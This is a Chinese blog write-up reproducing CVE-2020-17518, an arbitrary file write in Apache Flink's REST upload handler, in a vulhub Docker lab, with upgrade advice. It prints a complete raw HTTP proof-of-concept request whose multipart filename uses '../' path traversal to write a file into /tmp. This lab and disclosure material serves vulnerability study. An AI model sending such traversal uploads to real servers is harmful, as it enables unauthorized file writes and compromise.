Apache Flink -任意文件写入漏洞(CVE-2020-17518)

最新推荐文章于 2024-01-30 21:55:30 发布
最新推荐文章于 2024-01-30 21:55:30 发布
阅读量3.8k 收藏 3
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36197704/article/details/112305315
版权

1.漏洞描述

       Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。

2.影响版本

1.5.1-1.11.2

3.环境搭建

1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录

docker-compose up-d

2)访问http://192.168.210.227:8081,环境搭建成功,如下图所示

4.漏洞复现

构造数据包POC

POST /jars/upload HTTP/1.1
Host: 192.168.210.227:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 189

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

 

虽然返回400,但是success文件依然写入成功

5.修复建议

升级Flink 到1.11.3或1.12.0版本,下载链接为:

https://flink.apache.org/downloads.html

https://flink.apache.org/downloads.html

chaojixiaojingang
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Flink -任意文件写入漏洞复现(CVE-2020-17518
0xSec
01-11 1321
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)
flamelu#Vulnerability-1#CVE-2020-17518 Apache Flink 任意文件写入1
07-25
CVE-2020-17518 Apache Flink 任意文件写入影响范围。
Apache Fink 文件上传漏洞复现及利用
Tauil的博客
07-28 964
其它不修改,然后点击发送,因为该版本的ApacheFlink中存在有一个目录穿越漏洞,详细内容在。一个数据包,数据包中的文件,右键点击重发,然后可以看到数据包中内容。应该就是文件的名称,其创建文件的路径猜测是其默认文件路径的。boundary是分隔符,不用关注,查看到其。处进行检查或者强制规定的路径,而是使用类似。这样的直接创建文件的命令,我们可以通过修改。,我们可以使用该漏洞查看我们创建的内容。,所以猜测该网页文件地址应该是在。的效果,所以我们修改消息体内容为。查看网络数据包,然后上传任意文件。.....
Apache Flink文件上传漏洞CVE-2020-17518漏洞代码分析
SmileAssassn的博客
01-30 765
Apache Flink文件上传漏洞CVE-2020-17518漏洞代码分析
Vulhub Apache Flink 文件上传漏洞复现
weixin_53696027的博客
07-26 205
关于Vulhub Apache Flink 文件上传漏洞复现
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 4989
通过exp实现了对微软目前存在的office-word-2016的成功复现
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现
Senimo
07-28 1604
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。 ApacheFlink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP 头将上载的文件写入本地文件系统上的任意位置。 二、漏洞影响 1.5.1 < ApacheFlink < 1.11.2 三、漏洞复现 1、环境搭建
CVE-2020-17518 Apache Flink 上传路径遍历漏洞复现
Makboli的博客
07-02 489
CVE-2020-17518 Apache Flink 上传路径遍历漏洞复现
Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_50854662的博客
05-22 1023
Apache Flink 文件上传漏洞 (CVE-2020-17518)
CVE-2020-17518 flink任意文件上传漏洞复现
qq_49279082的博客
02-08 2470
本人对CVE-2020-17518漏洞的理解
flink读取不到文件_Flink 任意文件读取和写入
weixin_32823555的博客
01-26 2943
Flink 任意文件读取和写入一、前言Apache Flink 两个高危漏洞(CVE-2020-17518&CVE-2020-17519),分别是任意文件写入任意文件读取.二、commit 分析原代码String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);补丁String file...
apache-doris-flink-connector-1.11_2.12-1.0.3
05-05
Flink Doris Connector(apache-doris-flink-connector-1.11_2.12-1.0.3-incubating-src.tar.gz) Flink Doris Connector Version:1.0.3 Flink Version:1.11 Scala Version:2.12 Apache Doris是一个现代MPP分析...
apache-doris-flink-connector-1.14_2.12-1.0.3
05-05
Flink Doris Connector(apache-doris-flink-connector-1.14_2.12-1.0.3-incubating-src.tar.gz) Flink Doris Connector Version:1.0.3 Flink Version:1.14 Scala Version:2.12 Apache Doris是一个现代MPP...
apache-doris-flink-connector-1.13_2.12-1.0.3
05-05
Flink Doris Connector 源码(apache-doris-flink-connector-1.13_2.12-1.0.3-incubating-src.tar.gz) Flink Doris Connector Version:1.0.3 Flink Version:1.13 Scala Version:2.12 Apache Doris是一个现代...
apache-doris-flink-connector-1.12_2.12-1.0.3
05-05
Flink Doris Connector(apache-doris-flink-connector-1.12_2.12-1.0.3-incubating-src.tar.gz) Flink Doris Connector Version:1.0.3 Flink Version:1.12 Scala Version:2.12 Apache Doris是一个现代MPP...
实验-三、数据库安全性(目的、要求和模板).doc
04-24
实验-三、数据库安全性(目的、要求和模板).doc
基于Docker搭建K8s集群离线包
04-24
基于Docker搭建K8s集群离线包,包含部署时所需的全部文件,可在内网环境中使用,K8s为1.23.0版本,docker为20.10.9-3版本
基于springboot+vue实现的求职招聘类型网站源代码+数据库(优质毕设项目).zip
最新发布
04-24
基于springboot+vue实现的求职招聘类型网站源代码+数据库(优质毕设项目).zip个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 基于springboot+vue实现的求职招聘类型网站源代码+数据库(优质毕设项目).zip个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 基于springboot+vue实现的求职招聘类型网站源代码+数据库(优质毕设项目).zip个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行!基于springboot+vue实现的求
flink-sql-connector 和flink-connector 区别
05-17
Flink-SQL-Connector 和 Flink-Connector 都是 Apache Flink 的连接器,但它们的主要区别在于用途和功能。 Flink-SQL-Connector 是为了支持 Flink SQL 而开发的一组连接器,它们包括 JDBC、Elasticsearch、Kafka、HBase、JMS、Cassandra、Hive 和 MySQL 等。这些连接器可以将 Flink SQL 的查询结果发送到特定的数据源中,或从特定的数据源中读取数据并用于 Flink SQL 查询。因此,Flink-SQL-Connector 的主要用途是支持 Flink SQL 查询操作。 Flink-Connector 则是一个更通用的连接器框架,它提供了一种通用的方式来与外部系统进行交互,例如读写文件、消息队列、数据库、NoSQL 数据库、流处理引擎等。Flink-Connector 提供了一组接口和类来支持开发者编写自定义的连接器,以便与其他系统集成。因此,Flink-Connector 的主要用途是支持 Flink 与其他系统的交互操作,而不仅仅是支持 Flink SQL 查询操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值